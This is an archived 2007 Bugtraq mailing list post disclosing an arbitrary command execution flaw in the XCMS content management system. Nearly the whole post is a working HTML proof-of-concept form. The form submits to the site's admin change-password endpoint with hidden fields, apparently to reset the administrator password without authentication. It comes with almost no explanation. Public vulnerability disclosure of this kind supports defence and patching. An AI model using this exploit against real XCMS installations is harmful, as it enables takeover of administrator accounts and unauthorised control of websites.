| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20070922101736.4060.qmail@securityfocus.com>
Date: 22 Sep 2007 10:17:36 -0000
From: x0kster@...il.com
To: bugtraq@...urityfocus.com
Subject: xcms all version arbitrary code execution
<!--
-[ Name : XCMS Arbitrary Command Execution Vulnerability ]-
-[ Download : http://www.xcms.it/index.php?lng=it&mod=download&pg=indice&c=2 ]-
-[ Author : x0kster ]-
-[ Email : x0kster[AT]gmail[DOT]com ]-
-[ Date : 20-09-2007 ]-
-->
<html>
<head>
<title>-XCMS Arbitrary Command Execution Vuln by x0kster -</title>
</head>
<body>
<pre>
- [XCMS All Version Arbitrary Command Execution Vulnerability ] -
- [Bug found by x0kster - x0kster@...il.com ] -
</pre>
<form name="pass" method="post" action="http://www.xcms.it/index.php?lng=it&pg=admin&s=cpass">
<input type="hidden" name="pass" value="1190316852" />
<pre>
Password : <input type="password" size="20" name="password_1190316852" />
Repete password : <input type="password" size="20" name="rpassword_1190316852" />
<input type="submit" value="Modifica Password" />
</pre>
</form>
</body>
</html>